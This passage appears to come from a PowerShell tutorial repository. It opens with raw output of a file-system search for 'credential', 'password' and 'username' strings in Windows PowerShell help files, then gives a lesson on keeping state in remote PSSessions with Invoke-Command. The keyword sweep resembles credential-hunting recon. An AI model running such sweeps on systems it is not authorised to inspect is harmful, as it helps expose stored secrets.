following command starts a job without the required credentials. It C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Jobs.help.txt:305: credentials to run the command. The value of the Reason property is: C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Language_Modes.help.txt:172: PSCredential C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Pipelines.help.txt:367: Parameter [Credential] PIPELINE INPUT ValueFromPipelineByPropertyName NO COERCION C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Preference_Variables.help.txt:1084: ProxyCredential : C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_PSSession_Details.help.txt:106: the current user must be able to supply the credentials of a member of C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_PSSession_Details.help.txt:142: only if you can supply the credentials of the user who created the C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_PSSession_Details.help.txt:144: includes RunAs credentials. Otherwise, you can get, connect to, use, C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Disconnected_Sessions.help.txt:94: but only if they can supply the credentials that were used C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Disconnected_Sessions.help.txt:95: to create the session, or use the RunAs credentials of C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:63: name and password credentials on the local computer or the credentials C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:65: The credentials and the rest of the transmission are encrypted. C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:513: to use the Credential parameter of the Invoke-Command, New-PSSession, C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:514: or Enter-PSSession cmdlets to provide the credentials of a member of the C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:521: credentials. C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Requirements.help.txt:62: provide the credentials of an administrator. Otherwise, the command fails. C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:273: HOW TO PROVIDE ADMINISTRATOR CREDENTIALS C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:279: computer. Credentials are sometimes required even when the current user is C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:283: computer, or can provide the credentials of a member of the Administrators C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:284: group, use the Credential parameter of the New-PSSession, Enter-PSSession C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:287: For example, the following command provides the credentials of an C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:290: Invoke-Command -ComputerName Server01 -Credential Domain01\Admin01 C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:292: For more information about the Credential parameter, see New-PSSession, C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:374: 2. Use the Credential parameter in all remote commands. C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:376: This is required even when you are submitting the credentials C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:400: 2. Verify that a password is set on the workgroup-based computer. If a C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:401: password is not set or the password value is empty, you cannot run C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:404: To set password for your user account, use User Accounts in Control C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:408: 3. Use the Credential parameter in all remote commands. C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:410: This is required even when you are submitting the credentials C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:544: -- ProxyCredential C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:548: 1. Use the ProxyAccessType, ProxyAuthentication, and ProxyCredential C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:562: -ProxyAuthentication Negotiate -ProxyCredential Domain01\User01 C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:44: function ScreenPassword($instance) C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:50: foreach ($a in @(get-wmiobject win32_desktop)) { ScreenPassword($a) } C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:53: This script checks each user account. The ScreenPassword function returns C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:54: the name of any user account that does not have a password-protected C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:55: screen saver. If the screen saver is password protected, the function C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:529: $Cred = Get-Credential C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:530: Invoke-Command $s {Remove-Item .\Test*.ps1 -Credential $Using:Cred} C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:537: $Cred = Get-Credential C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:538: Invoke-Command $s {param($c) Remove-Item .\Test*.ps1 -Credential $c} -ArgumentList $Cred C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Script_Internationalization.help.txt:157:if (!($username)) { $msgTable.promptMsg } C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Session_Configurations.help.txt:304: the WithProfile session configuration or can supply the credentials of a C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Session_Configuration_Files.help.txt:230: RunAsPassword NoteProperty System.String RunAsPassword= C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:173: The MakeCert.exe tool will prompt you for a private key password. The C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:174: password ensures that no one can use or access the certificate without C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:175: your consent. Create and enter a password that you can remember. You will C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:176: use this password later to retrieve the certificate. C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:277: 6. Type a password, and then type it again to confirm. C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:293: 4. On the Password page, select "Enable strong private key protection", C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:294: and then enter the password that you assigned during the export C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:156: The Update-Help and Save-Help cmdlets have a UseDefaultCredentials C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:157: parameter that provides the explicit credentials of the current C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:161: The Update-Help and Save-Help cmdlets also have a Credential C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:164: Credential parameter is valid only when you use the SourcePath C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory.help.txt:32: Account and Password Policy Management are supported by cmdlets such as C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory.help.txt:34: Set-ADAccountControl, and Remove-ADFineGrainedPasswordPolicy. C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_Filter.help.txt:133: Get entries with a bad password count greater than five: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_Identity.help.txt:105: ADFineGrainedPasswordPolicy C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_Identity.help.txt:151: SAM User Name (sAMUserName) C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:34: ADFineGrainedPasswordPolicy C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:45: ADDefaultDomainPasswordPolicy C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:192: ADFineGrainedPasswordPolicy C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:193: Represents a fine grained password policy object; that is, an AD C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:194: object of type msDS-PasswordSettings in AD DS and is derived from C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:197: An ADFineGrainedPasswordPolicy may contain the following properties in C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:204: the directory attribute: msDS-PasswordComplexityEnabled C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:215: MaxPasswordAge - A property of type System.TimeSpan, derived from the C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:216: directory attribute: msDS-MaximumPasswordAge C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:218: MinPasswordAge - A property of type System.TimeSpan, derived from the C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:219: directory attribute: msDS-MinimumPasswordAge C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:221: MinPasswordLength - A property of type System.Int32, derived from the C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:222: directory attribute: msDS-MinimumPasswordLength C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:224: PasswordHistoryCount - A property of type System.Int32, derived from C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:225: the directory attribute: msDS-PasswordHistoryLength C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:228: directory attribute: msDS-PasswordSettingsPrecedence C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:232: msDS-PasswordReversibleEncryptionEnabled C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:433: AllowReversiblePasswordEncryption - A property of type System.Boolean, C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:436: attribute: ms-DS-UserEncryptedTextPasswordAllowed C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:441: CannotChangePassword - A property of type System.Boolean, derived from C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:463: LastBadPasswordAttempt - A property of type System.DateTime, derived C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:464: from the directory attribute: badPasswordTime C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:479: PasswordExpired - A property of type System.Boolean, for AD DS it is C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:482: directory attribute msDS-UserPasswordExpired C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:484: PasswordLastSet - A property of type System.DateTime, derived from the C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:487: PasswordNeverExpires - A property of type System.Boolean, for AD LDS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:490: directory attribute: msDS-UserDontExpirePassword C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:492: PasswordNotRequired - A property of type System.Boolean, for AD DS it C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:495: directory attribute: ms-DS-UserPasswordNotRequired C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:698: ADDefaultDomainPasswordPolicy C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:699: Represents the domain-wide password policy of an Active Directory C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:703: An ADDefaultDomainPasswordPolicy may contain the following properties C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:721: MaxPasswordAge - A property of type System.TimeSpan, derived from the C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:724: MinPasswordAge - A property of type System.TimeSpan, derived from the C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:727: MinPasswordLength - A property of type System.Int32, derived from the C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_ObjectModel.help.txt:730: PasswordHistoryCount - A property of type System.Int32, derived from C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\en-US\about_Scheduled_Jobs_Troubleshooting.help.txt:94: C:\Users\\AppData\Local\Microsoft\Windows\PowerShell\ScheduledJob C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\en-US\about_Scheduled_Jobs_Troubleshooting.help.txt:394: job or the permissions of the user who is specified by the Credential C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\en-US\about_Scheduled_Jobs_Troubleshooting.help.txt:425: C:\Users\\AppData\Local\Microsoft\Windows\PowerShell C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:55: PSCredential C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:216: user's credentials when connecting to the target computers. C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:218: Negotiate, and NegotiateWithImplicitCredential. The default C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:227: CAUTION: Credential Security Service Provider (CredSSP) C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:228: authentication, in which the user's credentials are passed C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:233: If the remote computer is compromised, the credentials that C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:273: parameter, the command must include the PSCredential C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:336: -PSCredential C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:345: or enter a variable that contains a PSCredential object, C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:346: such as one that the Get-Credential cmdlet returns. If C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters.help.txt:348: password. C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:21: PSComputerName and PSCredential. The PS-prefixed parameters configure C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:93: Specifies the mechanism that is used to authenticate the user's credentials C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:95: Credssp, Digest, Kerberos, Negotiate, and NegotiateWithImplicitCredential. C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:102: CAUTION: Credential Security Service Provider (CredSSP) authentication, in C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:103: which the user's credentials are passed to a remote computer to be C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:107: is compromised, the credentials that are passed to it can be used to control C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:160: command must include the PSCredential parameter. Also, the computer must be C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:209: -PSCredential C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:215: variable that contains a PSCredential object, such as one that the C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:216: Get-Credential cmdlet returns. If you enter only a user name, you will be C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters.help.txt:217: prompted for a password. C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_Workflows.help.txt:157: -Credential Domain01\Admin01 C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_Workflows.help.txt:174: -Credential Domain01\Admin01 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Automatic_Variables.help.txt:109: typically C:\Users\. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:181: parameter set, a UserName parameter in the User parameter set, and a C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:194: $UserName, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:220: $UserName, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:561: $UserName C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Functions_OutputTypeAttribute.help.txt:133: $UserName C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Jobs.help.txt:287: The following command starts a job without the required credentials. It C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Jobs.help.txt:305: credentials to run the command. The value of the Reason property is: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Language_Modes.help.txt:172: PSCredential C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Pipelines.help.txt:367: Parameter [Credential] PIPELINE INPUT ValueFromPipelineByPropertyName NO COERCION C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Preference_Variables.help.txt:1084: ProxyCredential : C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_PSSession_Details.help.txt:106: the current user must be able to supply the credentials of a member of C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_PSSession_Details.help.txt:142: only if you can supply the credentials of the user who created the C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_PSSession_Details.help.txt:144: includes RunAs credentials. Otherwise, you can get, connect to, use, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Disconnected_Sessions.help.txt:94: but only if they can supply the credentials that were used C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Disconnected_Sessions.help.txt:95: to create the session, or use the RunAs credentials of C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:63: name and password credentials on the local computer or the credentials C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:65: The credentials and the rest of the transmission are encrypted. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:513: to use the Credential parameter of the Invoke-Command, New-PSSession, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:514: or Enter-PSSession cmdlets to provide the credentials of a member of the C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:521: credentials. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Requirements.help.txt:62: provide the credentials of an administrator. Otherwise, the command fails. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:273: HOW TO PROVIDE ADMINISTRATOR CREDENTIALS C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:279: computer. Credentials are sometimes required even when the current user is C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:283: computer, or can provide the credentials of a member of the Administrators C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:284: group, use the Credential parameter of the New-PSSession, Enter-PSSession C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:287: For example, the following command provides the credentials of an C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:290: Invoke-Command -ComputerName Server01 -Credential Domain01\Admin01 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:292: For more information about the Credential parameter, see New-PSSession, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:374: 2. Use the Credential parameter in all remote commands. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:376: This is required even when you are submitting the credentials C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:400: 2. Verify that a password is set on the workgroup-based computer. If a C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:401: password is not set or the password value is empty, you cannot run C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:404: To set password for your user account, use User Accounts in Control C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:408: 3. Use the Credential parameter in all remote commands. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:410: This is required even when you are submitting the credentials C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:544: -- ProxyCredential C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:548: 1. Use the ProxyAccessType, ProxyAuthentication, and ProxyCredential C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:562: -ProxyAuthentication Negotiate -ProxyCredential Domain01\User01 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:44: function ScreenPassword($instance) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:50: foreach ($a in @(get-wmiobject win32_desktop)) { ScreenPassword($a) } C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:53: This script checks each user account. The ScreenPassword function returns C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:54: the name of any user account that does not have a password-protected C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:55: screen saver. If the screen saver is password protected, the function C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:529: $Cred = Get-Credential C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:530: Invoke-Command $s {Remove-Item .\Test*.ps1 -Credential $Using:Cred} C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:537: $Cred = Get-Credential C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:538: Invoke-Command $s {param($c) Remove-Item .\Test*.ps1 -Credential $c} -ArgumentList $Cred C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Script_Internationalization.help.txt:157:if (!($username)) { $msgTable.promptMsg } C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Session_Configurations.help.txt:304: the WithProfile session configuration or can supply the credentials of a C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Session_Configuration_Files.help.txt:230: RunAsPassword NoteProperty System.String RunAsPassword= C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:173: The MakeCert.exe tool will prompt you for a private key password. The C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:174: password ensures that no one can use or access the certificate without C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:175: your consent. Create and enter a password that you can remember. You will C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:176: use this password later to retrieve the certificate. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:277: 6. Type a password, and then type it again to confirm. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:293: 4. On the Password page, select "Enable strong private key protection", C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:294: and then enter the password that you assigned during the export C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:156: The Update-Help and Save-Help cmdlets have a UseDefaultCredentials C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:157: parameter that provides the explicit credentials of the current C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:161: The Update-Help and Save-Help cmdlets also have a Credential C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:164: Credential parameter is valid only when you use the SourcePath PS C:\Users\Administrator> ``` ================================================ FILE: 24-Powershell-Remoting-Part-5.md ================================================ #### 24. Powershell Remoting Part 5 #### Advanced PowerShell Remoting - Using ```Invoke-Command``` ```state-fully``` across ```sessions``` ```PowerShell PS C:\Users\Administrator\Desktop> New-PSSession -ComputerName JOHN-PC -Credential John-PC\John Id Name ComputerName State ConfigurationName Availability -- ---- ------------ ----- ----------------- ------------ 7 Session7 JOHN-PC Opened Microsoft.PowerShell Available PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-PSSession Id Name ComputerName State ConfigurationName Availability -- ---- ------------ ----- ----------------- ------------ 7 Session7 JOHN-PC Opened Microsoft.PowerShell Available PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> $sess = Get-PSSession ``` ```PowerShell PS C:\Users\Administrator\Desktop> Invoke-Command -ScriptBlock { $procs = Get-Process } -Session $sess ``` ```PowerShell PS C:\Users\Administrator\Desktop> Invoke-Command -ScriptBlock { $procs } -Session $sess Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName PSComputerName ------- ------ ----- ----- ----- ------ -- ----------- -------------- 23 2 1756 2020 30 0.00 1288 cmd JOHN-PC 22 2 1688 2060 30 0.01 1552 cmd JOHN-PC 40 3 708 3228 42 0.05 1220 conhost JOHN-PC 34 2 596 2664 32 0.00 3124 conhost JOHN-PC 417 5 1112 2300 33 0.12 352 csrss JOHN-PC 205 6 1220 2932 33 0.47 408 csrss JOHN-PC 66 3 892 2704 38 0.02 912 dwm JOHN-PC 789 23 24836 36064 196 2.99 696 explorer JOHN-PC 0 0 0 12 0 0 Idle JOHN-PC 731 12 3044 6840 32 1.11 492 lsass JOHN-PC 195 5 1628 3524 23 0.10 500 lsm JOHN-PC 56 3 868 4040 57 0.07 3160 notepad JOHN-PC 134 5 6272 4712 63 0.13 2924 python JOHN-PC 645 16 22040 13084 108 0.62 1664 SearchIndexer JOHN-PC 194 7 4120 5824 35 0.74 476 services JOHN-PC 29 1 216 520 4 0.06 272 smss JOHN-PC 282 9 4356 5732 58 0.03 1356 spoolsv JOHN-PC 347 7 2876 6084 38 0.41 624 svchost JOHN-PC 256 8 2496 5120 26 0.45 736 svchost JOHN-PC 554 13 14144 11188 77 0.75 788 svchost JOHN-PC 525 